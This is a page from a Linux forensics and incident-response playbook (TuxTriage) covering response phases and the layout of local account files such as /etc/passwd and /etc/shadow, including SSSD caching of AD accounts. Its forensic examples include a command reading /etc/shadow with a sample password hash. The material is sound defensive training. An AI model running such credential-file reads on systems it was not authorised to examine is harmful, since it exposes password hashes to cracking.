<!DOCTYPE HTML>
<html lang="en" class="sidebar-visible no-js light">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>Digital forensics &amp; Intrusion Response Playbook - *nix OS</title>
        <meta name="robots" content="noindex" />


        <!-- Custom HTML head -->
        
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="icon" href="favicon.svg">
        <link rel="shortcut icon" href="favicon.png">
        <link rel="stylesheet" href="css/variables.css">
        <link rel="stylesheet" href="css/general.css">
        <link rel="stylesheet" href="css/chrome.css">
        <link rel="stylesheet" href="css/print.css" media="print">

        <!-- Fonts -->
        <link rel="stylesheet" href="FontAwesome/css/font-awesome.css">
        <link rel="stylesheet" href="fonts/fonts.css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="highlight.css">
        <link rel="stylesheet" href="tomorrow-night.css">
        <link rel="stylesheet" href="ayu-highlight.css">

        <!-- Custom theme stylesheets -->

    </head>
    <body>
    <div id="body-container">
        <!-- Provide site root to javascript -->
        <script>
            var path_to_root = "";
            var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "navy" : "light";
        </script>

        <!-- Custom JS scripts for mdbook-pdf PDF generation -->
        <script type='text/javascript'>
            let markAllContentHasLoadedForPrinting = () =>
                window.setTimeout(
                    () => {
                        let p = document.createElement('div');
                        p.setAttribute('id', 'content-has-all-loaded-for-mdbook-pdf-generation');
                        document.body.appendChild(p);
                    }, 100
                );

            window.addEventListener('load', () => {
                // Expand all the <details> elements for printing.
                r = document.getElementsByTagName('details');
                for (let i of r)
                    i.open = true;

                try {
                    MathJax.Hub.Register.StartupHook('End', markAllContentHasLoadedForPrinting);
                } catch (e) {
                    markAllContentHasLoadedForPrinting();
                }
            });
        </script>
    <div style="display: none"><a href="#index">index</a><a href="#recommended_reading">recommended_reading</a><a href="#incident_handling">incident_handling</a><a href="#os_accounts">os_accounts</a><a href="#os_accounts_local">os_accounts_local</a><a href="#os_accounts_ad">os_accounts_ad</a><a href="#os_accounts_forensics">os_accounts_forensics</a><a href="#lateral_movement">lateral_movement</a><a href="#persistence">persistence</a><a href="#persistence_cron">persistence_cron</a><a href="#persistence_systemd">persistence_systemd</a><a href="#persistence_scripts">persistence_scripts</a><a href="#persistence_forensics">persistence_forensics</a><a href="#execution">execution</a><a href="#network">network</a><a href="#webhistory">webhistory</a><a href="#open_ports">open_ports</a><a href="#active_connections">active_connections</a><a href="#dns_cache">dns_cache</a><a href="#exfiltration">exfiltration</a><a href="#log_analysis">log_analysis</a><a href="#config">config</a><a href="#applications">applications</a><a href="#datasource_catalog">datasource_catalog</a><a href="#about">about</a></div>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script>
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script>
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            var html = document.querySelector('html');
            html.classList.remove('no-js')
            html.classList.remove('light')
            html.classList.add(theme);
            html.classList.add('js');
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script>
            var html = document.querySelector('html');
            var sidebar = null;
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            } else {
                sidebar = 'hidden';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <div class="sidebar-scrollbox">
                <ol class="chapter"><li class="chapter-item expanded affix "><a href="index.html">Introduction</a></li><li class="chapter-item expanded affix "><a href="recommended_reading.html">Recommended Reading</a></li><li class="chapter-item expanded affix "><a href="incident_handling.html">Incident Handling</a></li><li class="chapter-item expanded "><a href="os_accounts.html"><strong aria-hidden="true">1.</strong> User Accounts</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="os_accounts_local.html"><strong aria-hidden="true">1.1.</strong> Local User Accounts</a></li><li class="chapter-item expanded "><a href="os_accounts_ad.html"><strong aria-hidden="true">1.2.</strong> Active Directory Accounts</a></li><li class="chapter-item expanded "><a href="os_accounts_forensics.html"><strong aria-hidden="true">1.3.</strong> Forensic Artifacts</a></li></ol></li><li class="chapter-item expanded "><a href="lateral_movement.html"><strong aria-hidden="true">2.</strong> Lateral Movement</a></li><li class="chapter-item expanded "><a href="persistence.html"><strong aria-hidden="true">3.</strong> Persistence</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="persistence_cron.html"><strong aria-hidden="true">3.1.</strong> Cron Jobs</a></li><li class="chapter-item expanded "><a href="persistence_systemd.html"><strong aria-hidden="true">3.2.</strong> Systemd Services</a></li><li class="chapter-item expanded "><a href="persistence_scripts.html"><strong aria-hidden="true">3.3.</strong> Scripts</a></li><li class="chapter-item expanded "><a href="persistence_forensics.html"><strong aria-hidden="true">3.4.</strong> Forensic Artifacts</a></li></ol></li><li class="chapter-item expanded "><a href="execution.html"><strong aria-hidden="true">4.</strong> Execution</a></li><li class="chapter-item expanded "><a href="network.html"><strong aria-hidden="true">5.</strong> Network</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="webhistory.html"><strong aria-hidden="true">5.1.</strong> Web History</a></li><li class="chapter-item expanded "><a href="open_ports.html"><strong aria-hidden="true">5.2.</strong> Open Ports</a></li><li class="chapter-item expanded "><a href="active_connections.html"><strong aria-hidden="true">5.3.</strong> Active Connections</a></li><li class="chapter-item expanded "><a href="dns_cache.html"><strong aria-hidden="true">5.4.</strong> DNS Cache records</a></li></ol></li><li class="chapter-item expanded "><a href="exfiltration.html"><strong aria-hidden="true">6.</strong> Data Exfiltration</a></li><li class="chapter-item expanded "><a href="log_analysis.html"><strong aria-hidden="true">7.</strong> Log Analysis</a></li><li class="chapter-item expanded "><a href="config.html"><strong aria-hidden="true">8.</strong> System Configuration</a></li><li class="chapter-item expanded "><a href="applications.html"><strong aria-hidden="true">9.</strong> Installed Applications</a></li><li class="chapter-item expanded "><a href="datasource_catalog.html"><strong aria-hidden="true">10.</strong> Datasource Catalog</a></li><li class="spacer"></li><li class="chapter-item expanded affix "><a href="about.html">About</a></li></ol>
            </div>
            <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                                <div id="menu-bar-hover-placeholder"></div>
                <div id="menu-bar" class="menu-bar sticky bordered">
                    <div class="left-buttons">
                        <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                            <i class="fa fa-bars"></i>
                        </button>
                        <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                            <i class="fa fa-paint-brush"></i>
                        </button>
                        <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                        </ul>
                        <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                            <i class="fa fa-search"></i>
                        </button>
                    </div>

                    <h1 class="menu-title">Digital forensics &amp; Intrusion Response Playbook - *nix OS</h1>

                    <div class="right-buttons">
                        <a href="print.html" title="Print this book" aria-label="Print this book">
                            <i id="print-button" class="fa fa-print"></i>
                        </a>

                    </div>
                </div>

                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script>
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <div id="index"></div><h1 id="index-introduction"><a class="header" href="#index-introduction">Introduction</a></h1>
<p>In the current digital environment, robust and targeted incident response strategies are necessary to tackle the range of cyber threats organizations face. Despite Linux systems' inherent security strengths, they remain potential targets for attackers. Therefore, It is important to have a Linux-specific incident response playbook, which is the purpose of the <strong>TuxTriage Playbook</strong>.</p>
<p>The <strong>TuxTriage Playbook</strong> is an incident response playbook specifically developed for the Linux Operating Systems. It facilitates the triage and examination of suspicious live hosts, allowing for swift incident identification, triage, and evidence collection.</p>
<p>The playbook addresses several key investigative points that can aid an examiner in understanding the extent of a potential breach:</p>
<ul>
<li>
<p><strong>User Accounts</strong>: This section aims to identify all user accounts on the system, their respective permissions, and any recent account modifications. These details can reveal unauthorized system access.</p>
</li>
<li>
<p><strong>Lateral Movement</strong>: The playbook evaluates if the attacker has managed to gain access to other systems in the network. Identifying the tactics used in this movement can help improve defense mechanisms.</p>
</li>
<li>
<p><strong>Malware Persistence</strong>: This segment assesses how malware has managed to persist on the system, including using known persistence techniques such as auto-runs, allowing for a comprehensive malware investigation and removal process.</p>
</li>
<li>
<p><strong>Data Theft</strong>: The playbook investigates whether the attacker has attempted to access data within the system. This information is crucial in understanding the scope of the breach and informing recovery efforts.</p>
</li>
<li>
<p><strong>Configuration Management</strong>: The final section evaluates the current state of the system's configuration, detecting recent modifications that may indicate system compromise.</p>
</li>
</ul>
<p>By addressing each of these areas, the TuxTriage Playbook provides a rapid response protocol for incidents and informs long-term strategies for system hardening and threat prevention. This playbook is essential in navigating the challenges of Linux system breaches, ensuring a swift and effective incident response.</p>
<h2 id="index-how-to-use-this-book"><a class="header" href="#index-how-to-use-this-book">How to use this book?</a></h2>
<p>This book has been designed to be both a comprehensive guide and a handy reference manual for anyone interested in intrusion analysis. It provides a deep dive into raw files, data structures, and forensics artifacts, serving as a rich resource for both beginners and seasoned professionals in the field. Please take a moment to read through the following guidelines to make the most out of this resource.</p>
<p><strong>Start with Basics</strong>: If you are a beginner or need a refresher on the basic concepts, start from the first chapters that detail the raw files and data structures used in intrusion analysis.</p>
<p><strong>Understand the Data Structures</strong>: This book discusses data structures and file formats in detail. Ensure you understand these since they form the crux of many analyses that follow. The objective is to understand the file's contents and its limitations comprehensively.</p>
<p><strong>Explore Forensic Artifacts</strong>: Details about forensic artifacts that may be relevant to intrusion analysis are provided under each section of the book. These chapters can be instrumental in your practical work, allowing you to identify better, analyze, and interpret forensics artifacts during intrusion analysis.</p>
<p><strong>Refer to the Datasource Catalog</strong>: The Datasource Catalog section serves as a quick reference guide for all files of interest mentioned in the book. It briefly describes each file and its significance in intrusion analysis. You can refer to this section when encountering unfamiliar files or need to understand a file's relevance quickly.</p>
<p><strong>Recognize System-Specific Limitations</strong>: Please note that some files discussed in this book may not exist on certain systems based on their specific configurations. If you encounter this, don't be alarmed. This book aims to be as comprehensive as possible, but the nature of diverse system configurations means that not all files will be present on all systems.</p>
<p><strong>Minimized Use of System Commands</strong>: This book diverges from many other resources on the subject matter by largely refraining from using built-in system commands, save for the inspection of file contents using the <code>cat</code> command. This approach is adopted for several critical reasons:</p>
<ul>
<li>
<p><strong>Preservation of Evidence</strong>: To maintain the integrity of the investigation, we should avoid tampering with the system's state. Running various commands may inadvertently alter the system's state under scrutiny, potentially impacting the reliability of the evidence.</p>
</li>
<li>
<p><strong>Compatibility with Disk Images</strong>: The utilization of disk images is a common practice in digital forensics. Within this context, executing commands is typically unfeasible. By focusing on raw files and data structures, this book ensures its teachings are applicable even when working with disk images.</p>
</li>
<li>
<p><strong>Enabling Evidence Extraction</strong>: This book provides the knowledge necessary to extract relevant files from the system and conduct detailed analyses on a separate forensic workstation by focusing on raw files and data structures. This method ensures the preservation of the original evidence and enhances the overall investigative process by providing more flexibility and control over the analysis environment.</p>
</li>
</ul>
<p>This book is designed to be a journey into the heart of intrusion analysis, taking you from the basics to the complexities of forensic artifacts. By studying, practicing, and understanding the principles within, you'll be well-prepared to tackle real-world intrusion analysis tasks and challenges. </p>
<p>Happy hunting!</p>
<div style="break-before: page; page-break-before: always;"></div><div id="recommended_reading"></div><h1 id="recommended_reading-recommended-reading"><a class="header" href="#recommended_reading-recommended-reading">Recommended Reading</a></h1>
<p>The following resources provide substansial background on the cyber incident response process. </p>
<h2 id="recommended_reading-cisa-cybersecurity-incident--vulnerability-response-playbooks-1"><a class="header" href="#recommended_reading-cisa-cybersecurity-incident--vulnerability-response-playbooks-1">CISA: Cybersecurity Incident &amp; Vulnerability Response Playbooks <sup class="footnote-reference"><a href="#recommended_reading-cisa">1</a></sup></a></h2>
<p>Operational Procedures for Planning and Conducting Cybersecurity Incident and Vulnerability Response Activities in FCEB Information Systems.</p>
<h3 id="recommended_reading-when-to-use-this-playbook"><a class="header" href="#recommended_reading-when-to-use-this-playbook">When to use this playbook</a></h3>
<p>Use this playbook for incidents that involve confirmed malicious cyber activity for which a major incident has been declared or not yet been reasonably ruled out.</p>
<h2 id="recommended_reading-nist-computer-security-incident-handling-guide-2"><a class="header" href="#recommended_reading-nist-computer-security-incident-handling-guide-2">NIST: Computer Security Incident Handling Guide <sup class="footnote-reference"><a href="#recommended_reading-nist">2</a></sup></a></h2>
<p>This document has been created for computer security incident response teams (CSIRTs), system and network administrators, security staff, technical support staff, chief information officers (CIOs), computer security program managers, and others who are responsible for preparing for, or responding to, security incidents</p>
<h2 id="recommended_reading-cert-sg-unixlinux-intrusion-detection--3"><a class="header" href="#recommended_reading-cert-sg-unixlinux-intrusion-detection--3">CERT SG: UNIX/LINUX Intrusion Detection  <sup class="footnote-reference"><a href="#recommended_reading-SG">3</a></sup></a></h2>
<p>A cheat sheet dedicated to handlers investifating on a precise security issue. </p>
<h3 id="recommended_reading-who-should-use-irm-sheets"><a class="header" href="#recommended_reading-who-should-use-irm-sheets">Who should use IRM sheets</a></h3>
<ul>
<li>Administrators </li>
<li>Security Operation Center </li>
<li>CISOs and deputies </li>
<li>CERTs </li>
</ul>
<div class="footnote-definition" id="recommended_reading-cisa"><sup class="footnote-definition-label">1</sup>
<p><a href="https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf">https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf</a></p>
</div>
<div class="footnote-definition" id="recommended_reading-nist"><sup class="footnote-definition-label">2</sup>
<p><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf</a> </p>
</div>
<div class="footnote-definition" id="recommended_reading-SG"><sup class="footnote-definition-label">3</sup>
<p><a href="https://github.com/certsocietegenerale/IRM/blob/main/EN/IRM-3-UnixLinuxIntrusionDetection.pdf">https://github.com/certsocietegenerale/IRM/blob/main/EN/IRM-3-UnixLinuxIntrusionDetection.pdf</a></p>
</div>
<div style="break-before: page; page-break-before: always;"></div><div id="incident_handling"></div><h1 id="incident_handling-incident-handling-steps"><a class="header" href="#incident_handling-incident-handling-steps">Incident Handling Steps</a></h1>
<p>The incident response life cycle as defined by NIST Computer Security
Incident Handling Guide<sup class="footnote-reference"><a href="#incident_handling-nist">1</a></sup> has the following 5 steps:</p>
<ul>
<li><strong>Preparation</strong> </li>
<li><strong>Detection &amp; Analysis</strong></li>
<li><strong>Containment, Eradication &amp; Recovery</strong></li>
<li><strong>Post-Incident Activity</strong></li>
</ul>
<p>This playbook may be used to aid in the first two steps of the life cycle. </p>
<h2 id="incident_handling-preparation-phase"><a class="header" href="#incident_handling-preparation-phase">Preparation Phase</a></h2>
<p>The preparation phase calls for the establishment and training of an incident response team along with acquiring the necessary tools and resources to perform the response activities. 
This playbook is designed as a training guide for analysts working with Linux OS. </p>
<h2 id="incident_handling-detection--analysis"><a class="header" href="#incident_handling-detection--analysis">Detection &amp; Analysis</a></h2>
<p>Signs of an incident fall into one of two categories: <em>precursors</em> and <em>indicators</em>. A precursor is a sign that an incident may occur in the future. An indicator is a sign that an incident may have occurred or may be
occurring now <sup class="footnote-reference"><a href="#incident_handling-nist">1</a></sup>.</p>
<p>The playbook serves as a handbook and provides the sources for <em>indicators</em>. It details where to look for indicators, what conclusions can be drawn from the indicators as well as the data structure and organization of such artifacts. </p>
<h2 id="incident_handling-todo"><a class="header" href="#incident_handling-todo">TODO</a></h2>
<ul>
<li>Add the incident response process picture </li>
<li>Explain the process in detail </li>
</ul>
<div class="footnote-definition" id="incident_handling-nist"><sup class="footnote-definition-label">1</sup>
<p><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf</a></p>
</div>
<div class="footnote-definition" id="incident_handling-SG"><sup class="footnote-definition-label">2</sup>
<p><a href="https://github.com/certsocietegenerale/IRM/blob/main/EN/IRM-3-UnixLinuxIntrusionDetection.pdf">https://github.com/certsocietegenerale/IRM/blob/main/EN/IRM-3-UnixLinuxIntrusionDetection.pdf</a></p>
</div>
<div style="break-before: page; page-break-before: always;"></div><div id="os_accounts"></div><h1 id="os_accounts-user-accounts"><a class="header" href="#os_accounts-user-accounts">User Accounts</a></h1>
<p>User accounts are a crucial component of any digital forensics investigation. They provide valuable information about who had access to a system, what they did while logged in, and what resources they may have accessed. </p>
<p>User accounts can be local to the host or managed centrally using Active Directory, OpenLDAP, Novell eDirectory, etc.</p>
<p>There are three main types of user accounts on a Linux System:</p>
<ul>
<li>
<p><strong>Superuser account</strong>: Also known as the root, this account has full administrative privileges on the system. </p>
</li>
<li>
<p><strong>Regular user account</strong>: Regular user accounts have limited access to the system. They may only access files and resources they are explicitly granted access. A regular user can be granted additional privileges by adding the user to a group with the desired privileges or by granting the user specific permissions on specific files or directories. </p>
</li>
<li>
<p><strong>System account (Service account)</strong>: System accounts correspond to a service running on the system rather than to someone using the system. Service accounts are used by system services such as web servers, mail transport agents, databases etc. Note that there is no formal distinction between a regular user account vs. a system/service account at a system level. The key differences are that a regular user account has a login shell and wider privileges. </p>
</li>
</ul>
<h2 id="os_accounts-domain-user"><a class="header" href="#os_accounts-domain-user">Domain User</a></h2>
<ul>
<li>AD user </li>
<li>Home directory Example </li>
<li>No entry in the local files </li>
<li>WHAT OTHER ARTIFACT IS THERE </li>
<li>HOW DOES THE LOGON PROMPT KNOW TO ASK AGAIN IN GNOME </li>
<li></li>
</ul>
<p>there is a cache we can look for</p>
<h2 id="os_accounts-forensic-evidence"><a class="header" href="#os_accounts-forensic-evidence">Forensic Evidence</a></h2>
<ul>
<li>
<p>Command to list the shadow files </p>
</li>
<li>
<p>ls the home dir with time stamps </p>
<ul>
<li>lastlog</li>
</ul>
</li>
<li>
<p>Figure out earliest access date </p>
</li>
<li>
<p>Latest date? only from log? </p>
</li>
<li>
<p>LOG FILE analysis to look for users that are not accounted for </p>
</li>
<li>
<p>FILEs - what info is stored in file metadata about users </p>
</li>
</ul>
<div style="break-before: page; page-break-before: always;"></div><div id="os_accounts_local"></div><h1 id="os_accounts_local-local-user-accounts"><a class="header" href="#os_accounts_local-local-user-accounts">Local User Accounts</a></h1>
<p>These are accounts local to the host. </p>
<p>Local account information are stored in two files. </p>
<pre><code class="language-bash">/etc/passwd 
</code></pre>
<pre><code class="language-bash">/etc/shadow
</code></pre>
<p>Additionally group information is saved at the following location.</p>
<pre><code class="language-bash">/etc/group
</code></pre>
<pre><code class="language-bash">/etc/gshadow
</code></pre>
<h2 id="os_accounts_local-etcpasswd-1"><a class="header" href="#os_accounts_local-etcpasswd-1">/etc/passwd <sup class="footnote-reference"><a href="#os_accounts_local-rhel_pswd">1</a></sup></a></h2>
<p>The <code>/etc/passwd</code> file is a text file. Each line represents information about a single user account. This fields are seperated by a colon (<code>:</code>) symbol. There are seven fields saved in each row <sup class="footnote-reference"><a href="#os_accounts_local-nxcraft">2</a></sup>.</p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ cat /etc/passwd | grep tlasso
tlasso:x:1000:1001:tlasso:/home/tlasso:/bin/bash
[tlasso@rhel-richmondfc ~]$
</code></pre>
<ol>
<li><code>Username</code>: The user name of the user. </li>
<li><code>Password</code>: An x character indicates that the password is in the <code>/etc/shadow</code> file. </li>
<li><code>User ID (UID)</code>: A unique id assigned to the user</li>
<li><code>Group ID (GID)</code>: The primary group ID. </li>
<li><code>User ID Info</code>: Additional user information </li>
<li><code>Home Directory</code>: Home directory of a user</li>
<li><code>Command/shell</code>: Typically this is a shell. But if an account does not have interactive logon privileges then this can be set to <code>/sbin/nologin</code></li>
</ol>
<h2 id="os_accounts_local-etcshadow-3"><a class="header" href="#os_accounts_local-etcshadow-3">/etc/shadow <sup class="footnote-reference"><a href="#os_accounts_local-rhel_shdw">3</a></sup></a></h2>
<p>The <code>/etc/shadow</code> file contains one entry per line for each user account on the system. Each entry consists of several fields separated by colons (<code>:</code>). The fields typically include the username, password hash, and various account-related information such as password expiration, account expiration, and account locking.</p>
<p>The password hash stored in the <code>/etc/shadow</code> file is an encrypted version of the user's password. When a user attempts to log in, the system takes the password entered by the user, applies the same encryption algorithm, and compares the resulting hash with the one stored in the <code>/etc/shadow</code> file. If the hashes match, the user is granted access.</p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo cat /etc/shadow | grep tlasso
tlasso:$6$jP1ap6xJUfvAgVjH$JxTdfXUOIqbpa3FpgALilTJvGnUfuUcDn8Qz.cxBf6yrFjo2332IHsCkHtg9QCHM7A4p9EcOZn.tXBWYK3RVO0::0:99999:7:::
</code></pre>
<ol>
<li><code>Username</code>: The user name of the user.</li>
<li><code>Password</code>: Encrypted password in hash format.</li>
<li><code>Last password change date</code>: Data type is Long. 0 indicates that the user must change the password on next logon. Empty value inidcates that feature is disabled. A long value greater than 0 indicates the date of password change expressed in the form of days since Unix epoch. </li>
</ol>
<h2 id="os_accounts_local-etcgroup-4"><a class="header" href="#os_accounts_local-etcgroup-4">/etc/group <sup class="footnote-reference"><a href="#os_accounts_local-rhel_grp">4</a></sup></a></h2>
<p>The <code>/etc/group</code> file contains a list of groups, one entry per line. Each line is colon delimited and contains four fields. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo cat /etc/group | grep tlasso
wheel:x:10:tlasso
coaching-staff:x:1000:tlasso
</code></pre>
<ol>
<li><code>Group name</code>: Name of the group </li>
<li><code>Group Password</code>: When this field is set to <code>x</code>, then a password is required to join the group. </li>
<li><code>Group Id (GID)</code>: A numeric group id</li>
<li><code>Member List</code>: The list of users that belong to the group. List is comma seperated. </li>
</ol>
<h2 id="os_accounts_local-etcgshadow-5"><a class="header" href="#os_accounts_local-etcgshadow-5">/etc/gshadow <sup class="footnote-reference"><a href="#os_accounts_local-rhel_grp_shdw">5</a></sup></a></h2>
<p>The <code>/etc/gshadow</code> file contains the encrypted group password, group membership and administrator information. This file also contains information per group per line. It is colon delimeted and lists the members of the group in a comma seperated list </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo cat /etc/gshadow | grep tlasso
wheel:::tlasso
coaching-staff:!::tlasso 
</code></pre>
<ol>
<li><code>Group name</code> : Name of the group </li>
<li><code>Encrypted password</code>: Group password</li>
<li><code>Group administrators</code>: Comma delimited list of users. Add or remove from this list using <code>gpasswd</code> command. </li>
<li><code>Group members</code> : Non-admin group members.</li>
</ol>
<h2 id="os_accounts_local-user-account-creation"><a class="header" href="#os_accounts_local-user-account-creation">User account creation</a></h2>
<p>Please refer to RHEL<sup class="footnote-reference"><a href="#os_accounts_local-rhel_doc">6</a></sup> documentation for details and command references for user creation. </p>
<div class="footnote-definition" id="os_accounts_local-rhel_doc"><sup class="footnote-definition-label">6</sup>
<p><a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s2-users-cl-tools">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s2-users-cl-tools</a></p>
</div>
<div class="footnote-definition" id="os_accounts_local-nxcraft"><sup class="footnote-definition-label">2</sup>
<p><a href="https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/">https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/</a></p>
</div>
<div class="footnote-definition" id="os_accounts_local-rhel_pswd"><sup class="footnote-definition-label">1</sup>
<p><a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s2-acctsgrps-files#s3-acctsgrps-passwd">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s2-acctsgrps-files#s3-acctsgrps-passwd</a></p>
</div>
<div class="footnote-definition" id="os_accounts_local-rhel_shdw"><sup class="footnote-definition-label">3</sup>
<p><a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctsgrps-shadow">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctsgrps-shadow</a></p>
</div>
<div class="footnote-definition" id="os_accounts_local-rhel_grp"><sup class="footnote-definition-label">4</sup>
<p><a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctspgrps-group">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctspgrps-group</a></p>
</div>
<div class="footnote-definition" id="os_accounts_local-rhel_grp_shdw"><sup class="footnote-definition-label">5</sup>
<p><a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctsgrps-gshadow">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctsgrps-gshadow</a></p>
</div>
<div style="break-before: page; page-break-before: always;"></div><div id="os_accounts_ad"></div><h1 id="os_accounts_ad-active-directory-accounts"><a class="header" href="#os_accounts_ad-active-directory-accounts">Active Directory Accounts</a></h1>
<p>Active directory accounts are managed by the AD server. No local entries are manintained by the host regarding them. </p>
<p>System Security Services Daemon <code>(SSSD)</code> is generally used by RHEL for AD based authentication. </p>
<p>This is not limited to AD, the following combinations are supported. <sup class="footnote-reference"><a href="#os_accounts_ad-rhel_sssd">1</a></sup></p>
<div class="table-wrapper"><table><thead><tr><th>Identity Provider</th><th>Authentication Provider</th></tr></thead><tbody>
<tr><td>Identity Management</td><td>Identity Management</td></tr>
<tr><td>Active Directory</td><td>Active Directory</td></tr>
<tr><td>LDAP</td><td>LDAP</td></tr>
<tr><td>LDAP</td><td>Kerberos</td></tr>
<tr><td>Proxy</td><td>Proxy</td></tr>
<tr><td>Proxy</td><td>LDAP</td></tr>
<tr><td>Proxy</td><td>Kerberos</td></tr>
</tbody></table>
</div>
<p>SSSD does not create user accounts on the local system. However, SSSD can be configured to create home directories for IdM users. Once created, an IdM user home directory and its contents on the client are not deleted when the user logs out <sup class="footnote-reference"><a href="#os_accounts_ad-rhel_sssd">1</a></sup>. </p>
<p><img src="images/sssd_cache.png" alt="SSSD Works" /></p>
<p>SSSD maintains a local cache about the users that attempted to logon to the local system. </p>
<h3 id="os_accounts_ad-uidgid-for-ad-users"><a class="header" href="#os_accounts_ad-uidgid-for-ad-users">UID/GID for AD Users</a></h3>
<p>Windows uses security ids (SID) and is incompatible with Linux UID/SID. SSSD autogenerates the UID and GID from the SIDs when the user logs on to a linux host for the first time. This information is cached as mentioned above. Note that the UID generated from a SID is always the same. </p>
<p>ID mapping can be disabled. This should be used if AD defined POSIX attributes are to be used instead. </p>
<div class="footnote-definition" id="os_accounts_ad-rhel_sssd"><sup class="footnote-definition-label">1</sup>
<p><a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_authentication_and_authorization_in_rhel/understanding-sssd-and-its-benefits_configuring-authentication-and-authorization-in-rhel">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_authentication_and_authorization_in_rhel/understanding-sssd-and-its-benefits_configuring-authentication-and-authorization-in-rhel</a></p>
</div>
<div style="break-before: page; page-break-before: always;"></div><div id="os_accounts_forensics"></div><h1 id="os_accounts_forensics-forensic-artifacts"><a class="header" href="#os_accounts_forensics-forensic-artifacts">Forensic Artifacts</a></h1>
<p>There exists a number of utility programs that can generate the information listed below such as <code>wbinfo</code> and <code>getent</code>. Since we are interested in forensic evidence artifacts that can be collected and reviewed offline the focus here is to examine the file contents directly. This is also required when we are presented with a disk image of a system and not the live running system.</p>
<h3 id="os_accounts_forensics-unexpected-local-user-accounts"><a class="header" href="#os_accounts_forensics-unexpected-local-user-accounts">Unexpected Local user accounts</a></h3>
